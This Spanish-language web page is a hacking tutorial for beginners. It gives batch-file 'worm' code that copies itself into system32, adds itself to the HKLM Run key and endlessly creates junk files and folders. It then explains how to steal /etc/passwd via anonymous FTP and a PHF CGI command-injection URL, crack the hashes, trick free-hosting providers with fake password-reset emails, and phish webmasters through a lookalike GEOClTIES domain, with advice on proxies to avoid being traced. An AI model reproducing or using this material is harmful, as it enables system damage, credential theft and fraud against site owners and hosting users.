Inicio Exploits Descargas Programacion Open Source Tutoriales Videos
Video de como crear un virus gusano en batch desde 0.
Ideal para novatos en el tema.
[youtube]
http://www.youtube.com/watch?v=_oY9nbYhtRw
[youtube]
Codigo:
_____________________________________________
@echo off
copy %0%windir%\system32\worm.bat
REG ADD HKLM\software\microsoft\windows\currentversion\run /v hack
/d %windir%\system32\worm.bat
:worm
cd\
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm
_____________________________________________
si ejecutas el archivo worm.bat se crearan archivos infinitos en nuestro pc.
nuestro worm se autocopiara en el directorio
c:\windows\system32\worm.bat
cada ves que se incie el pc y la segunda linea es para agregar una entrada al
registro lo kual iniciara el virus kada ves ke se inicie sesion.
Hackeando Paginas web
1.Introducción:
En este texto le vamos hablar sobre como hackear una pagina web.Estas son sus
secciones:
Precauciones que debes tomar:
En las contraseñas - Archivos que hablan de las contraseñas
Desencryptando contraseña - Como desencryptar las contraseñas
Ftp - Como hackear una pagina por medio de ftp
Phf - Como hackear una pagina por medio de Phf
Home page gratis - Como hackear servidores de home page gratis
Home page gratis 2 - Otro metodo de como hackear servidores de home page
gratis
Telnet o Exploits - Como hackear una pagina usando telnet o exploits
2.Precauciones:
En este texto voy a enseñar los diferentes metodos que existen para hackear
una pagina,deseo recordarles que hackear una pagina es un crimen y puedes ir
preso,siempre y cuando entres en algun sistema y este registre tu I.P.Por lo
tanto antes de cometer un acto de hacking te recomiendo que tomes medidas de
seguridad asi como spoofing o proxys...
3.Sobre las contraseñas:
Las contraseñas estan en un archivo llamado passwd.Este archivo esta
normalmente en un archivo llamado etc/passwd.Entonces vamos hablar un poco
sobre el passwd.Cuando usted encuentra el archivo passwd la contraseña puede
venir encriptada o con shadow.La diferencia es que la contraseña encriptada
esta encriptada y la contraseña con shadow esta escondida en cualquier otro
lugar,no va a estar en el passwd.Las contraseñas con shadow son imposibles de
desencriptar!(Tomando en cuenta que tengas UNIX)una contraseña encriptada es
algo mas o menos asi:
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Ahora un ejemplo de una contraseña con shadow
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Puedes notar que tiene una "X" en la raiz,esta x tambien se puede representar
por un "*".Ahora usted ya asabe un poco mas sobre el archivo passwd y las
contraseñas
4.Desencryptando:
Para desencrytar una contraseña necesitaremos 3 archivos basicos.Una lista de
palabras,un desencriptador(yo te recomiendo el crackerjack/jack 14)y
logicamente en el archivo donde esta la contraseña(passwd)La lista de palabras
como su nombre lo dice, es ya una lista de palabras. Desencryptador es el
programa que usted va a utilizar para desencryptar la contraseña.Passwd en
este archivo es donde esta la contraseña encryptada.
Coloque todos esos items en un mismo directorio.Abre un prompt de ms-dos y
entra en el directorio donde estan.Ahora haz lo siguiente escribe:"el nombre
del desencriptador","nombre del archivo donde esta la contraseña" y el nombre
de la "lista de palabras".Entonces asumimos que nuestro programa es jack,el
archivo es passwd y la lista de palabras es lista.Entonces seria asi:jack
passwd lista.txt
5.FTP:
Quizásel ftp es el mejor metodo para hackear una pagina,Es el más simple y
rápido.Para hacer esto vamos a usar el ms-dos.Debe simplemente entrar en el
ftp de la página con la conexión anónima y hacer la transferencia directa del
archivo passwd.Abre un prompt de ms-dos.Vas a tener que entrar por ftp a la
pagina,la dirección es normalmente igual,entonces escribe ftp
WWW.
hackers.com,ahi le van a pedir su nombre de usuario,Coloque anonymous,ahora va
a pedir que coloques tu dirección de e-mail como contraseña.Claro ni se te
ocurra poner la tuya,pon otra(Ejemplo:[email protected])Vas a entrar al
ftp como user anonymus y restriction applly,eso significa que entrastes como
usuario anónimo y con restricciones aplicadas!.Ahora necesitas ir al
directorio etc.Entra y haz el download del directorio passwd.Para esto escribe
"get passwd".Pronto el archivo passwd va a estar en el directorio en el que
cuando usted entro en el ftp,Tipo windows - archivos de programa...!Ahora
solamente te queda desencriptarlo y listo tendras la contraseña en tus
manos...
6.PHF:
El PHF es con certeza el metodo mas fácil de obtener el archivo passwd.Es tan
sencillo que no necesitas muchos conocimientos,la unica cosa que debes saber
es saber abrir tu navegador y colocar una dirección mas nada!Lo unico malo de
este metodo es que hay una probabilidad de 95% de que no funcione.La mayoria
de los servidores han arreglando este bug.Lo que debes hacer es colocar esto
en tu navegador:
http://Direccón de la pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%
20/etc/passwd
7.Hackeando servidores de paginas web gratis:
Algunos servidores de home page como geocities,tripode y angel fire dan
espacio para que personas coloquen sus home pages.Hay modos muy simples de
obtener contraseñas de páginas que estan en estos servidores.Todo lo que
tienes es hacer es mandar un mail pidiendo que te devuelvan la contraseña y
ellos te mandaran la contraseña de la página.Más nada solo manda un e-mail
pidiendo la contraseña y trata de suministrarle toda la información posible
acerca de la página,ponle algo asi:"el mes pasado puse online una página
atraves de sus servicios y recibi una contraseña y un login,puse algunas cosas
en mi espacio y me fui de vacaciones,!Cuando volvi se me habia olvidado la
contraseña solo recuerdo el login(el login seria en este caso la dirección de
la página)En estos tiempos he tenido que cambiar mi proveedor de servicio de
correo electronico,por lo tanto ahora tengo otro mail distinto,mi viejo e-mail
era este(correo del webmaster de la página)Por favor espero a que me manden la
contraseña ya que no tengo un backup de los archivos colocados en la pagina y
no me gustaria perderlos.Espero que manden la contraseña lo más rápido que
puedan."Esta seria una muy buena treta para que caigan en la trampa y te
manden la contraseña,pero si haces algo mejor más rápido caeran y habras
hackeado la página.
Compañias como geocities estan muy ocupadas como para revisar si esto es
verdad o no,asi que un aproximado de 2 semanas te llegara la contraseña
8.Hackeando servidores de paginas web gratis(2):
Otro modo de hackear este tipo de páginas es engañar al propio webmaster de la
página.Este modo funciona normalmente con webmaster idiotas que no saben mucho
o que no perciben que ellos mismos estan dando su contraseña para ser
hackeados.Hay otro metodo más simple pero que demora más,lo que debes hacer es
crear una página donde se le diga al webmaster que si se registra recibira más
megas de alojamiento,de esta manera el caera facilmente,tienes que crear una
página que sea muy parecia a las de geocities,tripode,etc...-Si quieres ver un
buen ejemplo de lo que digo dirigete a Hacking Hotmail de ahi puedes fijarte y
hacer una buena trampa,si te animas y haces uno,no olvides mandarnoslos y te
lo agradeceremos mucho...-Hay otra técnica muy parecida pero es más
complicada,para esto tendras que necesitar de un servidor personal y cambiar
algunas cosas en tus configuraciones de tcp/ip,entra en las propiedades de tcp/ip
y luego entra en configuracion DNS.Selecciona para activar el DNS,ahora
escribe HOST-->WWW.GEOClTIES(recuerde que GEOClTIES esta escrito com "l" y una
"i")entonces no escribe en el dominio -- > COM.Hata ahora vas bien en
todo!Ok,ahora debes reiniciar el pc,sigue el mismo procedimiento del ejemplo
de la pagina que deberas crear,guarda esa pagina y colocala en el directorio
de páginas de su servdior,despues creas un directorio llamado miembros,entra
en este y crea uno llamado "tools",coloca toda la página en este
directorio,ponga su servidor a funcionar y entre en
HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html
La dirección tiene que ser esta para que funcione y listo la persona cae en la
trampa y tu tendras su contraseña en tu mail,el ejemplo aki expuesto fue con
geocities pero tambien sirve para angelfire,tripode,etc